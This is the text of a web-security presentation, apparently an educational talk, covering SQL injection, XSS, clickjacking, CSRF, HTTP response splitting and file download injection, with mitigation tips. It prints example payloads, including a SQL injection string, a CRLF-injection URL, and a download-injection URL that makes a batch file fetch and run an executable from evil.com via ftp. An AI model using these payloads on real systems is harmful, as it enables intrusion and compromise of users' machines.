Trendy Web Security

8/14/2019 Trendy Web Security

1/38

Trendy Web Security


2/38

A Review of times past


3/38

SQL Injection


4/38

password' OR 1=1; --


5/38

Parses as:SELECT username FROM users WHERE username =

'username' and password = '' OR 1=1


6/38

And you're in...


7/38

Cross Site Scripting(XSS)


8/38

About-Me fieldI enjoy long walks on the beach, and


9/38

Now, you have yourcode running in

another guy's browser


10/38

Have your code changehis linksys' DNS settings?


11/38

SQL Injections and XSSattacks are old news.


12/38

What's new(er)?


13/38

Click Jacking


14/38

A Demo...


15/38

No JS Needed!


16/38

Cross Site RequestForgery


17/38


18/38

You are now logged outof google.


19/38

Or... had your domainstolen


20/38

CSRF Creates a new Gmail Filter whichforwards certain emails

Hacker sends an email forwarded to yourhost, asking for a transfer + unlock

Hacker transfers your domain away.


21/38

HTTP ResponseSplitting


22/38

/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/

1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d

%0aShazam

/redir_lang.jsp?lang=English


23/38

HTTP/1.1 302 Moved Temporarily

Date: Wed, 24 Dec 2003 15:26:41 GMT

Location: http://10.1.1.1/by_lang.jsp?lang=foobar

Content-Length: 0

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 19

ShazamServer: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT

2003 271009 with


Set-Cookie:

JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/Connection: Close

302 Moved Temporarily

This document you requested has moved temporarily.

It's now at http://10.1.1.1/by_lang.jsp?l

ang=foobar

Content-Length: 0

HTTP/1.1 200 OK


Content-Length: 19

Shazam.


24/38

Why?

Cache Poisoning

Replace content Phishing

XSS

etc.


25/38

File Download Injection


26/38

An similar idea toresponse splitting


27/38

We've all writtendownload scripts:download.php?file=report.xls


28/38

$filename = basename($_GET["download"]);

header('Content-Disposition: attachment; filename="' . $filename . '"');readfile(basename($_GET["download"]));return;


29/38

http://[trusted_domain]/download.php?file=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe


30/38

HTTP/1.1 200 OKDate: Thu, 27 Mar 2008 05:02:24 GMTServer: ApachePath=/download

Content-Disposition: attachment;filename=attack.batContent-length: 88

echo get /pub/winzip/wzinet95.exe|ftp -A evil.comawzinet95.exeContent-Length: 0Content-Type: application/octet-stream;charset=euc-kr


31/38

It's a dangerous world...


32/38

How about someMitigation


33/38

Sensitive stuff inseparate browser?

As a user


34/38

Whitelist everything.Nothing gets through

w/o you knowing

As a programmer:


35/38

GET vs. POST. Usethem correctly.

As a programmer:


36/38

Use the real file name,and not the http

argument

Download Injection:


37/38


38/38

Links http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss

http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html

http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html

http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf

http://www.breakingpointsystems.com/community/blog/clickjacking

http://en.wikipedia.org/wiki/Cross-site_request_forgery

http://www.davidairey.com/google-gmail-security-hijack/

http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html

Trendy Web Security

Documents

Transcript of Trendy Web Security